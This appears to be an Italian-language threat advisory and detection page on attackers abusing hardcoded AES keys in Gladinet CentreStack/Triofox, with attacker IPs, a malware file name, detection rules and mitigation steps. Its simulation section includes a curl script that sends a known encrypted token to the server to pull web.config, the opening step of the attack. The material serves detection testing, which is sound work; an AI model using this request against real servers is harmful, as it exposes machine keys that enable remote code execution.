Sfruttamento Attivo della Vulnerabilità di Crittografia Non Sicura in Gladinet CentreStack/Triofox
Detection stack
- AIDR
- Alert
- ETL
- Query
Riassunto
Gli attori delle minacce stanno sfruttando attivamente la crittografia debole in Gladinet CentreStack e Triofox. La catena sfrutta chiavi AES codificate per recuperare il file web.config e poi si sposta su attacchi di deserializzazione ViewState. In due incidenti osservati il 15 dicembre, PowerShell consegnato tramite il processo di lavoro IIS è stato utilizzato per scaricare ed eseguire un binario dannoso chiamato conqueror.exe. L’attività è potenzialmente collegata al gruppo ransomware cl0p.
Indagine
Huntress ha registrato PowerShell avviato da w3wp.exe che ha invocato un payload codificato base64 per recuperare conqueror.exe da 185.196.11.207. L’eseguibile è stato salvato in C:UsersPublicconqueror.exe ed eseguito per l’enumerazione dell’host. Il comportamento successivo ha incluso una richiesta curl allo stesso server e l’uso di quser.exe per elencare le sessioni attive. L’ID evento 1316 ha anche catturato tentativi di sfruttamento da 146.70.134.50 associato a CVE-2025-30406.
Mitigazione
Gladinet ha rilasciato la versione 16.12.10420.56791, ruotando le chiavi crittografiche statiche e correggendo la debolezza della deserializzazione ViewState. Le organizzazioni dovrebbero aggiornare prontamente e ruotare i valori machineKey esistenti per invalidare l’esposizione precedente. Rivedere i log web per la stringa di query criptata “vghpI7EToZUDIZDdprSubL3mTZ2” per identificare il probing o lo sfruttamento. Ridurre ulteriormente il rischio disabilitando gli handler IIS non necessari e applicando una convalida rigorosa degli input.
Risposta
Allerta su PowerShell con payload base64 provenienti da w3wp.exe e sulla creazione o esecuzione di C:UsersPublicconqueror.exe. Isolare gli host interessati, conservare la telemetria IIS e dell’endpoint, e bloccare il traffico in uscita verso gli IP e URL dannosi citati. Verificare l’integrità del web.config, ruotare immediatamente le chiavi macchina, e condurre una revisione forense di tutti i sistemi CentreStack/Triofox per determinare l’impatto e rimuovere gli artefatti.
Flusso di attacco
Rilevamenti
Comportamento Sospetto del Server Microsoft IIS (tramite cmdline)
Visualizza
Possibile Sfruttamento del Server Web o WebApp [Windows] (tramite cmdline)
Visualizza
File Sospetti nel Profilo Utente Pubblico (tramite file_evento)
Visualizza
Esecuzione Sospetta dal Profilo Utente Pubblico (tramite creazione_processi)
Visualizza
Download o Upload tramite Powershell (tramite cmdline)
Visualizza
Download di File Sospetto – IP Diretto (tramite proxy)
Visualizza
IOC (HashSha256) per rilevare: Sfruttamento Attivo della Vulnerabilità Criptografica Insicura di Gladinet CentreStack/Triofox
Visualizza
IOC (SourceIP) per rilevare: Sfruttamento Attivo della Vulnerabilità Criptografica Insicura di Gladinet CentreStack/Triofox
Visualizza
IOC (DestinationIP) per rilevare: Sfruttamento Attivo della Vulnerabilità Criptografica Insicura di Gladinet CentreStack/Triofox
Visualizza
Rilevamento dell’Esecuzione di PowerShell tramite cmd.exe con Codifica Base64 [Windows Powershell]
Visualizza
Potenziale Esecuzione di Codice Remota tramite Processo di Lavoro IIS con PowerShell [Creazione Processo Windows]
Visualizza
Richiesta GET Crittografata per web.config in Gladinet CentreStack [Webserver]
Visualizza
Esecuzione di Simulazione
Prerequisito: Il Controllo Pre-volo della Telemetria & Baseline deve essere stato superato.
Ragionamento: Questa sezione dettaglia l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrativa DEVONO riflettere direttamente le TTP identificate e mirare a generare la telemetria esatta attesa dalla logica di rilevamento. Esempi astratti o non correlati porteranno a una diagnosi errata.
-
Narrazione dell’Attacco & Comandi:
Un attaccante, dopo aver identificato l’istanza di Gladinet CentreStack, elabora un payload crittografato che si conforma al formato di query vulnerabile. Usando un client web legittimo (ad es.,
curlo PowerShellInvoke-WebRequest), l’attaccante emette una richiesta GET all’endpoint nascosto/storage/filesvr.dncon il token crittografato che, una volta decrittografato dal server, si risolve in una richiesta perweb.config. La richiesta è indistinguibile dal traffico normale a livello di protocollo, ma il modello cifrato unico è catturato dalla regola di rilevamento. -
Script di Test di Regressione:
#!/usr/bin/env bash # ------------------------------------------------------------ # Simulare Richiesta GET crittografata per web.config di Gladinet CentreStack # ------------------------------------------------------------ # Server Target (sostituire con effettivo hostname/IP) TARGET="http://target-server.example.com" # Uno dei payload crittografati conosciuti dalla regola (esempio) ENCRYPTED_PAYLOAD="/storage/filesvr.dn t=vghpI7EToZUDIZDdprSubL3mTZ2:aCLI:8Zra5AOPvX4TEEXlZiueqNysfRx7Dsd3P5l6eiYyDiG8Lvm0o41m:ZDplEYEsO5ksZajiXcsumkDyUgpV5VLxL|372varAu" # Emettere la richiesta curl -s -o /dev/null -w "%{http_code}n" "${TARGET}${ENCRYPTED_PAYLOAD}" # ------------------------------------------------------------ -
Comandi di Pulizia:
# Non sono state effettuate modifiche persistenti all'obiettivo; è stato generato solo traffico di rete. # Se è stata avviata una regola firewall temporanea o una cattura di rete per il test, rimuoverla: # Esempio: arrestare tcpdump (Linux) o rimuovere filtro WinPcap (Windows) # sudo pkill -f tcpdump